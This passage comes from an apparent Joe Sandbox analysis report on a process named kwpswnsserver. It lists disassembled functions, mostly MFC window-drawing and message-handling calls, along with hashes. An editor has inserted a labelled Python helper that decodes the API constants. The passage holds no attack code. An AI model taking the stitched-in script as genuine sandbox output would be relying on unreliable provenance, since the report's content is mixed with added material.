                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 6C8BED4C
                                                                  • CreateCompatibleBitmap.GDI32(?,?,?), ref: 6C8BEDA1
                                                                  • CreateDIBSection.GDI32(?,?), ref: 6C8BEE13
                                                                  • CreateDIBSection.GDI32(?,00000028,00000000,?,00000000,00000000), ref: 6C8BEE4C
                                                                  • CreateDIBSection.GDI32(?,00000028,00000000,?,00000000,00000000), ref: 6C8BEE7F
                                                                  • BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 6C8BEEE7
                                                                  • GetWindowRect.USER32(?,?), ref: 6C8BEF56
                                                                  • BitBlt.GDI32(?,?,?,?,?,?,00000000,00000000,00CC0020), ref: 6C8BF0A6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                   • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Create$Section$CompatibleRect$BitmapClientH_prolog3_Window
                                                                  • String ID: (
                                                                  • API String ID: 2918208214-3887548279
                                                                  • Opcode ID: 51c6925f575eb448206a55ce7c0f6600b5447407e14f3b25a13a300a37f3f044
                                                                  • Instruction ID: a62a1f32be30b80ce94843ea3dfbf8a353650b8c90fea3dea97954895cd1f9b1
                                                                  • Opcode Fuzzy Hash: 51c6925f575eb448206a55ce7c0f6600b5447407e14f3b25a13a300a37f3f044
                                                                  • Instruction Fuzzy Hash: 0DD14B75A0061AAFDF25CFA8CA849EEBBB9FF08304F10456AE519A7710DB30AD55CF50
                                                                  APIs
                                                                    • Part of subcall function 6C89BAAC: GetWindowLongW.USER32(?,000000EC), ref: 6C89BAB9
                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 6C952B5B
                                                                  • FillRect.USER32(?,?,00000000), ref: 6C952BA5
                                                                  • GetWindowRect.USER32(?,?), ref: 6C952BFE
                                                                  • GetWindowRect.USER32(8B0C4DFF,?), ref: 6C952C12
                                                                  • SetRectEmpty.USER32(?), ref: 6C952C35
                                                                  • SetRect.USER32(?,?,?,?,?), ref: 6C952C75
                                                                  • IsRectEmpty.USER32(?), ref: 6C952C7F
                                                                  • FillRect.USER32(?,?,00000000), ref: 6C952CA4
                                                                  • SetRectEmpty.USER32(?), ref: 6C952D0F
                                                                    • Part of subcall function 6C883F11: ClientToScreen.USER32(?,6C8BDD00), ref: 6C883F20
                                                                    • Part of subcall function 6C883F11: ClientToScreen.USER32(?,6C8BDD08), ref: 6C883F2D
                                                                    • Part of subcall function 6C883F50: ScreenToClient.USER32(?,6C8993A1), ref: 6C883F5F
                                                                    • Part of subcall function 6C883F50: ScreenToClient.USER32(?,6C8993A9), ref: 6C883F6C
                                                                  • InflateRect.USER32(?,00000001,00000001), ref: 6C952E2D
                                                                  • IntersectRect.USER32(?,?,?), ref: 6C952E3C
                                                                  • InflateRect.USER32(?,00000001,00000001), ref: 6C952E48
                                                                  • IntersectRect.USER32(?,?,?), ref: 6C952E57
                                                                  • FillRect.USER32(?,?,00000000), ref: 6C952E75
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                   • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$ClientScreen$EmptyFillInflateWindow$Intersect$Long
                                                                  • String ID:
                                                                  • API String ID: 3688554768-0
                                                                  • Opcode ID: 9dd532fbbc74c48a9cea306df78ffa97d833f978b86cc6beef5ed246f0973f04
                                                                  • Instruction ID: 77cf86178e4e881da30707141d4c434be53676682c8afa34f3127617f450e2d7
                                                                  • Opcode Fuzzy Hash: 9dd532fbbc74c48a9cea306df78ffa97d833f978b86cc6beef5ed246f0973f04
                                                                  • Instruction Fuzzy Hash: B5C12C71A0061ADFCF05CFA8CA889EEB7F9FF49304B144269E815EB610D735EA16CB50
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 6C90CD75
                                                                    • Part of subcall function 6C8FE220: __EH_prolog3.LIBCMT ref: 6C8FE227
                                                                  • GetWindowRect.USER32(?,?), ref: 6C90CE5B
                                                                    • Part of subcall function 6C89BB93: GetDlgCtrlID.USER32(?), ref: 6C89BB9E
                                                                    • Part of subcall function 6C90EA7B: GetWindowRect.USER32(?,?), ref: 6C90EA89
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                   • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog3RectWindow$Ctrl
                                                                  • String ID: %TsPane-%d$%TsPane-%d%x$IsFloating$MRUWidth$Panes$PinState$RecentFrameAlignment$RecentRowIndex$RectRecentDocked$RectRecentFloat
                                                                  • API String ID: 2598721110-2628993547
                                                                  • Opcode ID: 80e55429bf6cfc69338827cefa4fe0ebe6494f0e2510cda0cf54fe676d84d147
                                                                  • Instruction ID: e7f74f4d2211b02fafad170fa35f63e930d90a7b5d8269fb14e51ff04fae522b
                                                                  • Opcode Fuzzy Hash: 80e55429bf6cfc69338827cefa4fe0ebe6494f0e2510cda0cf54fe676d84d147
                                                                  • Instruction Fuzzy Hash: 05814B35A002199FCF04DFA4C8949FEB776BF89314F594568E916AB3A1DB30AC02CF60
                                                                  APIs
                                                                  • GetMessageW.USER32(?,00000000,0000000F,0000000F), ref: 6C8C0532
                                                                  • DispatchMessageW.USER32(?), ref: 6C8C0540
                                                                  • PeekMessageW.USER32(?,00000000,0000000F,0000000F,00000000), ref: 6C8C054E
                                                                  • GetCapture.USER32 ref: 6C8C0558
                                                                  • SetCapture.USER32(?), ref: 6C8C056C
                                                                  • GetWindowRect.USER32(?,?), ref: 6C8C0589
                                                                  • GetCapture.USER32 ref: 6C8C05FC
                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 6C8C0619
                                                                  • DispatchMessageW.USER32(?), ref: 6C8C063F
                                                                  • GetScrollPos.USER32(00000000,00000002), ref: 6C8C075C
                                                                  • RedrawWindow.USER32(?,00000000,00000000,00000581), ref: 6C8C0779
                                                                  • ReleaseCapture.USER32 ref: 6C8C081B
                                                                  • IsWindow.USER32(?), ref: 6C8C0824
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                   • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Message$Capture$Window$Dispatch$PeekRectRedrawReleaseScroll
                                                                  • String ID:
                                                                  • API String ID: 1873598099-0
                                                                  • Opcode ID: d79fe2c979774e8eed93d99995273aaa75dd1f6b0fcc25e0f09bbae238709040
                                                                  • Instruction ID: 795634df974d3583c2e1da66bcd30e5f91723dd8fe1fdf63c5eba139c3e433e8
                                                                  • Opcode Fuzzy Hash: d79fe2c979774e8eed93d99995273aaa75dd1f6b0fcc25e0f09bbae238709040
                                                                  • Instruction Fuzzy Hash: 0BA1A071B012198BDF28DF68C998BEE3BB5FF49744F144579E80AAB685CB309801CF91
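                                                                   The "APIs" bullets in the entries above list each Win32 call with its immediate arguments and the address of the call site, but the immediates are raw hex (0x79 and 0x12 to GetKeyState, 0x001100A6 to BitBlt, 0x0362 and 0x036A to SendMessageW/PostMessageW, 0x581 to RedrawWindow) and the "ref" addresses are only meaningful relative to the dump's "Offset: 6C850000" base. The Python script below is an added example, not part of the Joe Sandbox report or of the analyzed sample: it parses bullets in the format used on this page, resolves a small table of constants to their symbolic names, and computes each call site's RVA from the stated base. The constant table is the editor's and is limited to values taken from the public Windows SDK headers and from MFC's afxpriv.h (WM_SETMESSAGESTRING, WM_KICKIDLE) and afxres.h (AFX_IDS_IDLEMESSAGE); the sample input is constructed by copying bullets from the entries above, including two "Part of subcall function" lines.

```python
import re
from dataclasses import dataclass
from typing import Optional

# One bullet of a Joe Sandbox "APIs" list, e.g.
#   "• GetKeyState.USER32(00000079), ref: 6C894D22"
#   "• Part of subcall function 6C8A00A7: GetFocus.USER32 ref: 6C8A00AB"
API_LINE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r"(?:\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+))?\s*$"
)

@dataclass
class ApiCall:
    name: str
    module: str
    args: list                  # int for a known immediate, None for "?"
    ref: Optional[int]          # call-site address as printed in the report
    subcall_of: Optional[int]   # function the call is reported from, if a subcall

def _parse_arg(tok: str) -> Optional[int]:
    tok = tok.strip()
    return None if tok == "?" else int(tok, 16)   # "-0000E001" parses as a negative int

def parse_api_line(line: str) -> Optional[ApiCall]:
    m = API_LINE.match(line)
    if not m:
        return None
    raw = m.group("args")
    args = [_parse_arg(t) for t in raw.split(",")] if raw else []
    return ApiCall(name=m.group("name"), module=m.group("module"), args=args,
                   ref=int(m.group("ref"), 16) if m.group("ref") else None,
                   subcall_of=int(m.group("sub"), 16) if m.group("sub") else None)

def parse_apis(text: str) -> list[ApiCall]:
    calls = [parse_api_line(line) for line in text.splitlines()]
    return [c for c in calls if c is not None]

# Symbol tables (editor's selection from winuser.h/wingdi.h and MFC afxpriv.h).
MSG = {0x000F: "WM_PAINT", 0x014F: "CB_SHOWDROPDOWN",
       0x0362: "WM_SETMESSAGESTRING (MFC afxpriv.h)", 0x036A: "WM_KICKIDLE (MFC afxpriv.h)"}
RDW = {0x1: "RDW_INVALIDATE", 0x2: "RDW_INTERNALPAINT", 0x4: "RDW_ERASE", 0x8: "RDW_VALIDATE",
       0x10: "RDW_NOINTERNALPAINT", 0x20: "RDW_NOERASE", 0x40: "RDW_NOCHILDREN",
       0x80: "RDW_ALLCHILDREN", 0x100: "RDW_UPDATENOW", 0x200: "RDW_ERASENOW",
       0x400: "RDW_FRAME", 0x800: "RDW_NOFRAME"}
# (API name, argument index) -> immediate -> symbol
CONSTANTS = {
    ("GetKeyState", 0): {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x79: "VK_F10"},
    ("GetSysColor", 0): {0x10: "COLOR_3DSHADOW", 0x14: "COLOR_3DHIGHLIGHT"},
    ("BitBlt", 8): {0x00CC0020: "SRCCOPY", 0x001100A6: "NOTSRCERASE", 0x008800C6: "SRCAND",
                    0x00EE0086: "SRCPAINT", 0x00660046: "SRCINVERT",
                    0x00E20746: "ROP3 0xE2 DSPDxax (mask blit)"},
    ("CombineRgn", 3): {1: "RGN_AND", 2: "RGN_OR", 3: "RGN_XOR", 4: "RGN_DIFF", 5: "RGN_COPY"},
    ("SendMessageW", 1): MSG, ("PostMessageW", 1): MSG,
    ("GetMessageW", 2): MSG, ("GetMessageW", 3): MSG,
    ("PeekMessageW", 2): MSG, ("PeekMessageW", 3): MSG,
}

def decode(call: ApiCall) -> list[str]:
    """Symbolic names for the immediates of a call that the tables above know about."""
    notes = []
    for i, v in enumerate(call.args):
        table = CONSTANTS.get((call.name, i))
        if v is not None and table and v in table:
            notes.append(f"arg{i}={table[v]}")
    if call.name == "RedrawWindow" and len(call.args) > 3 and call.args[3]:
        notes.append("arg3=" + "|".join(n for bit, n in RDW.items() if call.args[3] & bit))
    # WM_SETMESSAGESTRING carries a string resource id in wParam; the report prints it
    # both as 0000E001 and as -0000E001, so compare the magnitude.
    if (call.name == "SendMessageW" and len(call.args) > 2 and call.args[1] == 0x0362
            and call.args[2] is not None and abs(call.args[2]) == 0xE001):
        notes.append("arg2=AFX_IDS_IDLEMESSAGE")
    return notes

def rva(call: ApiCall, image_base: int) -> Optional[int]:
    """Call-site offset from the dump's 'Offset:' base, for locating it in the .sdmp file."""
    return None if call.ref is None else call.ref - image_base

def summarize(text: str, image_base: int = 0x6C850000) -> dict:
    calls = parse_apis(text)
    by_module: dict = {}
    for c in calls:
        by_module[c.module] = by_module.get(c.module, 0) + 1
    return {"calls": len(calls),
            "direct": sum(1 for c in calls if c.subcall_of is None),
            "by_module": by_module,
            "decoded": {f"{c.name}@{rva(c, image_base):X}": decode(c)
                        for c in calls if c.ref is not None and decode(c)}}

# Constructed sample: bullets copied from the function entries on this page.
SAMPLE_APIS = """\
  • Part of subcall function 6C8A00A7: GetFocus.USER32 ref: 6C8A00AB
  • Part of subcall function 6C8A00A7: SendMessageW.USER32(00000000,0000014F,00000000,00000000), ref: 6C8A0115
• SendMessageW.USER32(?,00000362,-0000E001,00000000), ref: 6C894CE3
• GetKeyState.USER32(00000079), ref: 6C894D22
• GetKeyState.USER32(00000012), ref: 6C894D33
• PostMessageW.USER32(?,0000036A,00000000,00000000), ref: 6C894E0F
• GetSysColor.USER32(00000014), ref: 6C882AFD
• BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,001100A6), ref: 6C882C3E
• PeekMessageW.USER32(?,00000000,0000000F,0000000F,00000000), ref: 6C8C054E
• RedrawWindow.USER32(?,00000000,00000000,00000581), ref: 6C8C0779
• __EH_prolog3.LIBCMT ref: 6C882AC6
"""

if __name__ == "__main__":
    for key, notes in summarize(SAMPLE_APIS)["decoded"].items():
        print(key, ", ".join(notes))
```

                                                                   Feeding a whole entry's "APIs" block to summarize() gives a per-module call count and the decoded immediates keyed by RVA, which is what you want when checking whether a function is the sample's own logic or framework code: calls to GetKeyState(VK_F10)/GetKeyState(VK_MENU) paired with WM_SETMESSAGESTRING and WM_KICKIDLE are MFC frame-window menu handling, and the RVA lets you jump to the same spot in the listed .sdmp dump.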
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 6C90CB78
                                                                    • Part of subcall function 6C8FE220: __EH_prolog3.LIBCMT ref: 6C8FE227
                                                                    • Part of subcall function 6C89BB93: GetDlgCtrlID.USER32(?), ref: 6C89BB9E
                                                                    • Part of subcall function 6C909EC4: __EH_prolog3.LIBCMT ref: 6C909ECB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                   • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog3$Ctrl
                                                                  • String ID: %TsPane-%d$%TsPane-%d%x$IsFloating$MRUWidth$Panes$PinState$RecentFrameAlignment$RecentRowIndex$RectRecentDocked$RectRecentFloat
                                                                  • API String ID: 3879667756-2628993547
                                                                  • Opcode ID: 8ee140afa95f064847f7efded9bd72ea728fe3748703db2ef9b3ecc661f9eb67
                                                                  • Instruction ID: aaa4055c7f5f4ae42a9026d0171e0e2092fb50aed2e42c072a6282b8fe83d310
                                                                  • Opcode Fuzzy Hash: 8ee140afa95f064847f7efded9bd72ea728fe3748703db2ef9b3ecc661f9eb67
                                                                  • Instruction Fuzzy Hash: CB519575B0022EAFCF08DF64C8949FE7B75BF49314B044569E816AB381DB35AD06CBA1
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 6C8B6F7E
                                                                  • SetCursor.USER32(?,00000048,6C8B6425,00000000,00000200,00000000), ref: 6C8B701D
                                                                    • Part of subcall function 6C883D59: __EH_prolog3.LIBCMT ref: 6C883D60
                                                                    • Part of subcall function 6C883D59: GetDC.USER32(00000000), ref: 6C883D8C
                                                                    • Part of subcall function 6C8A0935: __EH_prolog3_GS.LIBCMT ref: 6C8A093C
                                                                    • Part of subcall function 6C8A0935: CreateRectRgnIndirect.GDI32(?), ref: 6C8A0974
                                                                    • Part of subcall function 6C8A0935: CopyRect.USER32(?,?), ref: 6C8A0988
                                                                    • Part of subcall function 6C8A0935: InflateRect.USER32(?,?,?), ref: 6C8A099E
                                                                    • Part of subcall function 6C8A0935: IntersectRect.USER32(?,?,?), ref: 6C8A09AA
                                                                    • Part of subcall function 6C8A0935: CreateRectRgnIndirect.GDI32(?), ref: 6C8A09B4
                                                                    • Part of subcall function 6C8A0935: CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 6C8A09C9
                                                                    • Part of subcall function 6C8A0935: CombineRgn.GDI32(?,?,?,00000003), ref: 6C8A09E3
                                                                    • Part of subcall function 6C8A0935: CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 6C8A0A2A
                                                                    • Part of subcall function 6C8A0935: SetRectRgn.GDI32(?,?,00000004,?,?), ref: 6C8A0A47
                                                                    • Part of subcall function 6C8A0935: CopyRect.USER32(?,?), ref: 6C8A0A52
                                                                    • Part of subcall function 6C883DAE: ReleaseDC.USER32(?,00000000), ref: 6C883DE2
                                                                  • GetFocus.USER32 ref: 6C8B70B4
                                                                  • SetTimer.USER32(?,0000EC07,000001F4,00000000), ref: 6C8B71A5
                                                                  • TrackMouseEvent.USER32(?,?,?,?,?,?,00000000), ref: 6C8B71DC
                                                                  • SendMessageW.USER32(?,00000362,0000E001,00000000), ref: 6C8B7262
                                                                  • InvalidateRect.USER32(?,?,00000001,?,?,?,?,?,?,00000000), ref: 6C8B739D
                                                                  • InflateRect.USER32(?,00000000,?), ref: 6C8B73E3
                                                                  • RedrawWindow.USER32(?,?,00000000,00000401,?,?,?,?,?,00000000), ref: 6C8B73F6
                                                                  • KillTimer.USER32(?,0000EC07,?,?,?,?,?,00000000), ref: 6C8B7485
                                                                  • SetTimer.USER32(?,0000EC07,000001F4,00000000), ref: 6C8B74A3
                                                                  • UpdateWindow.USER32(?), ref: 6C8B74CC
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$Create$Timer$CopyH_prolog3_IndirectInflateWindow$CombineCursorEventFocusH_prolog3IntersectInvalidateKillMessageMouseRedrawReleaseSendTrackUpdate
                                                                  • String ID:
                                                                  • API String ID: 3035320136-0
                                                                  • Opcode ID: 1283023e56d2beb889afb32b70e36e34d7d0a78f6940a992a2de344f2b19ff10
                                                                  • Instruction ID: 1a0d6b029717727b2c9ed2e41daf21021abb0131fb8fd8224798008f8bfb47d0
                                                                  • Opcode Fuzzy Hash: 1283023e56d2beb889afb32b70e36e34d7d0a78f6940a992a2de344f2b19ff10
                                                                  • Instruction Fuzzy Hash: 48F1A530601716EFDB298F64C954BADBBB1BF45318F144729F829A77D0DB30A851CBA0
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 6C8CE21F
                                                                  • IsWindowVisible.USER32(?), ref: 6C8CE278
                                                                  • CreateRectRgn.GDI32(00000000,00000000,?,?), ref: 6C8CE2AA
                                                                  • CreateRectRgn.GDI32(00000000,00000000,00000005,00000005), ref: 6C8CE2C9
                                                                  • CombineRgn.GDI32(?,?,?,00000003), ref: 6C8CE2E3
                                                                  • CreateEllipticRgn.GDI32(00000000,00000000,0000000B,0000000B), ref: 6C8CE2F7
                                                                  • CombineRgn.GDI32(?,?,?,00000002), ref: 6C8CE311
                                                                  • CreateRectRgn.GDI32(?,00000000,?,00000005), ref: 6C8CE32A
                                                                  • CombineRgn.GDI32(?,?,?,00000003), ref: 6C8CE344
                                                                  • CreateEllipticRgn.GDI32(?,00000000,?,0000000B), ref: 6C8CE360
                                                                  • CombineRgn.GDI32(?,?,?,00000002), ref: 6C8CE37A
                                                                  • SetWindowRgn.USER32(?,00000000,00000001), ref: 6C8CE38E
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Create$Combine$Rect$EllipticWindow$H_prolog3Visible
                                                                  • String ID:
                                                                  • API String ID: 1706452674-0
                                                                  • Opcode ID: 63122730c34b5c44ab6c76737cb829e0f5c3d581401da576c546ff4851a201a1
                                                                  • Instruction ID: b38e1ea093e1147e6c0f7a310af5d55a363657856d2d71760a9fc71a10b8764a
                                                                  • Opcode Fuzzy Hash: 63122730c34b5c44ab6c76737cb829e0f5c3d581401da576c546ff4851a201a1
                                                                  • Instruction Fuzzy Hash: C6417571A0021AABDF25AFA4CD55EFFBB39BF04709F104928B115A66D0DB319905CBA1
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 6C936E9A
                                                                  • GetObjectW.GDI32(00000018,00000018,00000000), ref: 6C936EB1
                                                                    • Part of subcall function 6C936DF0: CreateDIBSection.GDI32(00000000,00000028,00000000,?,00000000,00000000), ref: 6C936E67
                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 6C936F31
                                                                  • SelectObject.GDI32(?,00000018), ref: 6C936F44
                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 6C936F62
                                                                  • SelectObject.GDI32(?,?), ref: 6C936F77
                                                                  • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 6C936F96
                                                                  • SelectObject.GDI32(?,00000000), ref: 6C936FA4
                                                                  • SelectObject.GDI32(?,00000000), ref: 6C936FAE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Object$Select$Create$Compatible$H_prolog3Section
                                                                  • String ID:
                                                                  • API String ID: 2431383920-3916222277
                                                                  • Opcode ID: 73e6047ed0b7ee43d38c3d2d3fb10da275762c387e8957aec613c483425f358e
                                                                  • Instruction ID: d1a49a722924bef5c3fa282bbc4955287461cdc1226e050c91288daf0aa13dac
                                                                  • Opcode Fuzzy Hash: 73e6047ed0b7ee43d38c3d2d3fb10da275762c387e8957aec613c483425f358e
                                                                  • Instruction Fuzzy Hash: 6241AD72E00229EFDB119FA4CD94AEEBB78FF45308F108528E515A7690CB35D909DB60
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 6C8BE752
                                                                  • GetClientRect.USER32(?,?), ref: 6C8BE770
                                                                  • SetRectEmpty.USER32(?), ref: 6C8BE7C4
                                                                  • MapWindowPoints.USER32(?,?,?,00000002), ref: 6C8BE80F
                                                                  • MapWindowPoints.USER32(?,?,?,00000002), ref: 6C8BE898
                                                                  • GetWindowRect.USER32(?,?), ref: 6C8BE8BD
                                                                  • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,00CC0020), ref: 6C8BE8E9
                                                                  • OffsetRect.USER32(?,00000000,00000000), ref: 6C8BE997
                                                                  • InflateRect.USER32(?,00000000,00000000), ref: 6C8BE9F5
                                                                  • IsRectEmpty.USER32(?), ref: 6C8BEAF3
                                                                  • IsRectEmpty.USER32(?), ref: 6C8BEC83
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
